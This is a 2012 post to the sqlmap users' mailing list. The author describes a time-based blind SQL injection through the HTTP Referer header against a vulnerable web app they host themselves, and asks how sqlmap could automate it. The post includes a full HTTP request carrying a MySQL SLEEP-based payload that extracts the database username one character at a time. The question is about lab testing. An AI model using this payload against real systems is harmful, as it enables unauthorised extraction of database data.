[sqlmap-users] sqlmap SQL blind time-based injection (MySQL)
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] sqlmap SQL blind time-based injection (MySQL)
|
From: Alton J. <alt...@gm...> - 2012-10-07 21:25:13
|
In my situation, my vulnerable parameter is Referer in the HTTP headers. I am able to enumerate the username and database name manually, but can someone explain or point me to an article that gives details about sqlmap and time-based with mysql? Here is an example of how I was able to enumerate the name. I'm unsure if there's any "custom" way of getting sqlmap work with this. Code: GET /vulnwebapp/index.php?id=2 HTTP/1.1 Host: 192.168.127.133 Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: '+IF(SUBSTRING(USER(),1,1)='r',SLEEP(5),1)+' Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 FYI, I'm testing this on a vulnerable web app hosted by myself. So with the above request, the page sleeps because the first character of the current username is "r", which eventually allows me to change 1,1 to 2,1 and so forth until I figure out that the username is "root." Is there any way to get sqlmap to assist with this type of attack? Thanks, |
